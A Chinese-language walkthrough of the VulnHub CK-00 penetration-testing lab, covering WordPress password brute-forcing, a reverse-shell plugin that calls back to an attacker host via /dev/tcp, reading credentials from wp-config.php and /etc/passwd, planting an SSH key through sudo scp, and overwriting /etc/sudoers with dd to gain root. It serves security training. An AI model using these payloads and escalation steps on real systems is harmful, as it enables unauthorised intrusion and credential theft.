這是VulnHub 平台的一個用於練習滲透測試和漏洞利用的靶機。它被設計為一個簡單難度的挑戰,目標是讓滲透測試人員鍛練情資搜集 、弱密碼分析及權限提升的技能。該靶機滲透做法如下
https://www.vulnhub.com/entry/ck-00,444
收集情報
尋找目標
$ sudo netdiscover -i eth1
Currently scanning: 192.168.0.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 1 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.0.123 08:00:27:6a:4e:4d 1 60 PCS Systemtechnik GmbH 發現主機後使用nmap掃描
t0thkr1s@darlene:~/Downloads$ sudo nmap -A -Pn -sC -p- 192.168.0.123
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-24 09:45 CET
Nmap scan report for 192.168.0.123
Host is up (0.00043s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 d2:6f:64:b5:4c:22:ce:b2:c9:8a:ab:57:0e:69:4a:0f (RSA)
| 256 a8:6f:9c:0e:d2:ee:f8:73:0a:0f:5f:57:1c:2f:59:3a (ECDSA)
|_ 256 10:8c:55:d4:79:7f:63:0f:ff:ea:c8:fb:73:1e:21:f6 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: WordPress 5.2.2
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: CK~00 – Just another WordPress site發現ssh和web服務,並使用wordpress
取得wordpress管理員權限
使用wpscan分析wordpress弱點,發現wordpress後台管理員帳密為admin admin
$ wpscan --url http://192.168.0.123 -U admin -P /usr/share/wordlists/rockyou.txt
...omit...
[!] Valid Combinations Found:
| Username: admin, Password: admin取得反向shell
製作一個plugin並放入反向shell,設定連回攻擊機192.168.0.111:1234,方式如下,然後在wordpress後台的plugins頁面,上傳rshellplugin.zip
$ touch rshell.php
$ vim rshell.php
<?php
/**
* Plugin Name: Reverse Shell Plugin
* Plugin URI:
* Description: Reverse Shell Plugin
* Version: 1.0
* Author: raymond
* Author URI: https://systw.net
*/
exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.0.111/1234 0>&1'");
?>
$ zip rshellplugin.zip rshell.php監聽port 1234可成功拿到反向shell
$ nc -nlvp 1234
listening on [any] 1234 ...
...omit...
wwww-data@ck00:/var/www/html/wp-admin$
wwww-data@ck00:/var/www/html/wp-admin$ cd /home/ck
wwww-data@ck00:/home/ck$ ls
...omit...
ck00-local-flag
...omit...
ps:
除了這個方法外,也可以用metasploit的模組exploit/unix/webapp/wp_admin_shell_upload來拿反向shell
Privilege Escalation to bla
搜集情報嘗試入侵其他帳號,發現有bla用戶,也有疑似bla的密碼,嘗試登入可成功
www-data@ck00:/var/www/html$ cat wp-config.php
...omit...
/** MySQL database password */
define( 'DB_PASSWORD', 'bla_is_my_password' );
...omit...
www-data@ck00:/var/www/html$ cat /etc/passwd
...omit...
bla:x:1002:1002:bla,0000,0000,0000:/home/bla:/bin/bash
...omit...
www-data@ck00:/var/www/html$ su - bla
su - bla
Password: bla_is_my_password
bla@ck00:~$ Privilege Escalation to bla1
嘗試將bla的權限提升,使用sudo -l發現scp指令有高權限,因此可利用這點對ssh登入認證做手腳
bla@ck00:~$ sudo -l
sudo -l
[sudo] password for bla: bla_is_my_password
Matching Defaults entries for bla on ck00:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User bla may run the following commands on ck00:
(bla1) /usr/bin/scp在攻擊機制做public key 和private key,分別為bla1.pub和bla1
attacker@192.168.0.111:~/Downloads$ ssh-keygen -f bla1
Generating public/private rsa key pair.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in bla1
Your public key has been saved in bla1.pub
The key fingerprint is:
SHA256:L/rdNL1obo0xHAyc76uPzZjPlkc4+VvlS3c2s5kYXgE attacker@192.168.0.111
The key's randomart image is:
+---[RSA 3072]----+
| . . |
| + |
| + E |
| + . |
| S o + ..|
| . O...o|
| . . o%.=*|
| . o XOoO+X|
| ... *OX+o* |
+----[SHA256]-----+在目標機中,以bla身份把攻擊機的bla1.pub複制到/home/bla1/.ssh/authorized_keys
bla@ck00:~$ sudo -u bla1 /usr/bin/scp attacker@192.168.0.111:/home/t0thkr1s/Downloads/bla1.pub /home/bla1/.ssh/authorized_keys
The authenticity of host '192.168.0.111 (192.168.0.111)' can't be established.
ECDSA key fingerprint is SHA256:g626ptplxc2u6oHhURvhEsEnXQTs8mbygf0VFAIqqeU.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.0.111' (ECDSA) to the list of known hosts.
attacker@192.168.0.111's password:
bla1.pub在攻擊機使用bla1用戶搭配bla1的private key以ssh方式登入目標主機
attacker@192.168.0.111:~/Downloads$ ssh -i bla1 bla1@192.168.0.123
bla1@ck00:~$Privilege Escalation to ck-00
用bla1身份,發現可以使用rbash(restricted bash) ,這是一種功能很少受限制的bash,因此使用ck-00的身份去運行rbash這個程序,成功得到ck-00的shell
bla1@ck00:~$ sudo -l
Matching Defaults entries for bla1 on ck00:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User bla1 may run the following commands on ck00:
(ck-00) NOPASSWD: /bin/rbash
bla1@ck00:~$ sudo -u ck-00 /bin/rbash
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
ck-00@ck00:~$ 檢查ck-00權限後發現能以root身份執行dd
ck-00@ck00:~$ sudo -l
Matching Defaults entries for ck-00 on ck00:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User ck-00 may run the following commands on ck00:
(root) NOPASSWD: /bin/dd將ck-00新權限寫到/etc/sudoers
ck-00@ck00:~$ echo "ck-00 ALL=(ALL) NOPASSWD: ALL" | sudo dd of=/etc/sudoers
0+1 records in
0+1 records out
30 bytes copied, 0.0000112222 s, 22.1 kB/s
ck-00@ck00:~$ sudo su
root@ck00:/home/bla1#
root@ck00:/home/bla1# ls /root
...omit...
ck00-root-flag.txt
...omit...成功取得root權限,並可讀取ck00-root-flag.txt
refer
https://medium.com/infosec-adventures/ck-00-walkthrough-800be72362b3
https://www.armourinfosec.com/ck00-vulnhub-walkthrough